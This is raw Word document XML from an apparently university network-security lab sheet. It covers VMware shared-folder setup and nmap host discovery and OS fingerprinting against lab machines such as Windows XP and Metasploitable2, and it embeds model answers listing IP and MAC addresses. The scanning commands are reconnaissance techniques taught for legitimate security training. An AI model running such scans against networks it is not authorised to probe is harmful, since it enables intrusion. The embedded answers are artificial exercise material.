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B5" w:rsidRPr="003E6BB5" w:rsidRDefault="00294422" w:rsidP="00C71E11">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab-</w:t>
      </w:r>
      <w:r w:rsidR="001C3C32">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00CD3F2E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00581F8D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Network Security – </w:t>
      </w:r>
      <w:r w:rsidR="003602D0">
        <w:t>Security Audit Refresh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837CF4" w:rsidRDefault="00294422" w:rsidP="00725DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab </w:t>
      </w:r>
      <w:r w:rsidR="00EB007D">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>reiterates the topics covered in the last three classes</w:t>
      </w:r>
      <w:r w:rsidR="000D10C7">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>. We will look at storing information from our pentest</w:t>
      </w:r>
      <w:r w:rsidR="00983119">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>/security audit</w:t>
      </w:r>
      <w:r w:rsidR="000D10C7">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a database and try some exploits</w:t>
      </w:r>
      <w:r w:rsidR="00BF218D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00725DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF74C3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Shared Folder Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>There is a problem with the shared folders configuration for VMWare Workstation in our lab. We need the shared folder to work for the exercises today… so make sure you perform these steps first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Right-click “WindowsXP-SP3” in your “Library” pane in VMWare Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Select the “Options” tab at the top of the new windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Select “Shared Folders” on the left side pane of the window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Under “Folder sharing” on the right, make sure “Always enabled” is selected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Click “OK” in bottom right corner to save the changes you have made</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>You will need to do the same for Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Right-click “Kali-Linux-2016-2” in your “Library” pane in VMWare Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Select the “Options” tab at the top of the new windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Select “Shared Folders” on the left side pane of the window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00972146">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Under “Folder sharing” on the right, make sure “Always enabled” is selected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972146" w:rsidRDefault="00972146" w:rsidP="00725DF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Click “OK” in bottom right corner to save the changes you have made</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB2C6F" w:rsidRDefault="00EB2C6F" w:rsidP="00EB2C6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>After start Kali Linux double click the “</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2C6F">
        <w:t>mount-shared-folders</w:t>
      </w:r>
      <w:r>
        <w:t>.sh” file on the Desktop, and select “Run in Terminal”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00597139" w:rsidRDefault="00597139" w:rsidP="00725DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF0509" w:rsidRDefault="00BB7FF8" w:rsidP="00AF0509">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exercise-5-1-1</w:t>
      </w:r>
      <w:r w:rsidR="00AF0509">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EB007D">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0509" w:rsidRDefault="00AF0509" w:rsidP="00AF0509">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00673426" w:rsidRDefault="000A77B1" w:rsidP="00AF0509">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>We discussed host discovery in Lab-4-1 and again in class today. Since we have a new network architecture, (new virtual machines) it is beneficial to perform host discovery again. Use the nmap tool to perform host discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB31EC" w:rsidRDefault="00EB31EC" w:rsidP="00AF0509">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB31EC" w:rsidRPr="00A31B07" w:rsidRDefault="00EB31EC" w:rsidP="000D10C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t># nmap –</w:t>
      </w:r>
      <w:r w:rsidR="000A77B1" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A77B1" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>192.168.19.*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713A78" w:rsidRDefault="00713A78" w:rsidP="00AF0509">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007944EB" w:rsidRDefault="000A77B1" w:rsidP="007944EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6216A196" wp14:editId="1941EB7C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>273685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5705475" cy="25241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24125"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="007944EB" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>192.168.19.1 – 00:50:56:C0:00:01</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00B24440" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>192.168.19.12 – 00:0C:29:D9:A8:6C</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00B24440" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>192.168.19.254 – 00:50:56:E7:38:74</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00B24440" w:rsidRPr="00573FEE" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>192.168.19.11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6A196" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:398.05pt;margin-top:21.55pt;width:449.25pt;height:198.7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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="007944EB" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>192.168.19.1 – 00:50:56:C0:00:01</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00B24440" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>192.168.19.12 – 00:0C:29:D9:A8:6C</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00B24440" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>192.168.19.254 – 00:50:56:E7:38:74</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00B24440" w:rsidRPr="00573FEE" w:rsidRDefault="00B24440" w:rsidP="00573FEE">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>192.168.19.11</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007944EB" w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q1.</w:t>
      </w:r>
      <w:r w:rsidR="007944EB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Document each network host found, including IP address and MAC address</w:t>
      </w:r>
      <w:r w:rsidR="004F4454">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007944EB" w:rsidRDefault="007944EB" w:rsidP="00AF0509">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00983119" w:rsidRDefault="00F85832" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>An important part of host discovery is determining the operating system of the target</w:t>
      </w:r>
      <w:r w:rsidR="00983119">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Remember the –O flag is required to perform operating system detection. The command below demonstrates usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85832" w:rsidRPr="00A31B07" w:rsidRDefault="00F85832" w:rsidP="001E747B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3465A4"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"># nmap –O </w:t>
      </w:r>
      <w:r w:rsidR="001E747B" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>&lt;ip-address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85832" w:rsidRDefault="00F85832" w:rsidP="00F85832">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F85832" w:rsidRDefault="004F2FC0" w:rsidP="00F85832">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q2</w:t>
      </w:r>
      <w:r w:rsidR="00F85832" w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F85832">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF1336">
        <w:t>For each host discovered in question 1 and 2, perform an operating system detection scan and document the operating system type</w:t>
      </w:r>
      <w:r w:rsidR="00F85832">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1336" w:rsidRDefault="00DF1336" w:rsidP="00F85832">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6497DAAA" wp14:editId="30ACA1EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286888</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5705475" cy="937895"/>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37895"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00DF1336" w:rsidRDefault="00B24440" w:rsidP="000700B1">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>192.168.19.12 – Windows XP SP2 or SP3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00795EE5" w:rsidRDefault="00795EE5" w:rsidP="000700B1">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                              <w:t>192.168.19.10 – Linux Metasploitable2</w:t>
                            </w:r>
                            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
                            <w:bookmarkEnd w:id="0"/>
                          </w:p>
                          <w:p w:rsidR="00B24440" w:rsidRDefault="00B24440" w:rsidP="000700B1">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="FF0000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00B24440" w:rsidRPr="00C77796" w:rsidRDefault="00B24440" w:rsidP="000700B1">
                            <w:pPr>
                              <w:spacing w:after="0"/>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7DAAA" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:398.05pt;margin-top:22.6pt;width:449.25pt;height:73.85pt;z-index:251715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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00DF1336" w:rsidRDefault="00B24440" w:rsidP="000700B1">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>192.168.19.12 – Windows XP SP2 or SP3</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00795EE5" w:rsidRDefault="00795EE5" w:rsidP="000700B1">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>192.168.19.10 – Linux Metasploitable2</w:t>
                      </w:r>
                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:bookmarkEnd w:id="1"/>
                    </w:p>
                    <w:p w:rsidR="00B24440" w:rsidRDefault="00B24440" w:rsidP="000700B1">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00B24440" w:rsidRPr="00C77796" w:rsidRDefault="00B24440" w:rsidP="000700B1">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>NOTE: Disregard the following IP addresses: 192.168.19.1 and 192.168.19.254</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F85832" w:rsidRDefault="00F85832" w:rsidP="00F85832">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRDefault="0014684A" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Congratulations, we have identified a new target on our network. </w:t>
      </w:r>
      <w:r w:rsidR="00CA156C">
        <w:t xml:space="preserve">Now, we are going to use </w:t>
      </w:r>
      <w:r w:rsidR="00CA156C" w:rsidRPr="0032386E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>zenmap</w:t>
      </w:r>
      <w:r w:rsidR="00CA156C">
        <w:t xml:space="preserve"> to generate a </w:t>
      </w:r>
      <w:r w:rsidR="0032386E">
        <w:t xml:space="preserve">graphical </w:t>
      </w:r>
      <w:r w:rsidR="00CA156C">
        <w:t xml:space="preserve">network diagram. You can start </w:t>
      </w:r>
      <w:r w:rsidR="00CA156C" w:rsidRPr="0032386E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>zenmap</w:t>
      </w:r>
      <w:r w:rsidR="00CA156C">
        <w:t xml:space="preserve"> using the following command in a terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRDefault="00CA156C" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA156C" w:rsidRPr="00A31B07" w:rsidRDefault="00CA156C" w:rsidP="00CA156C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
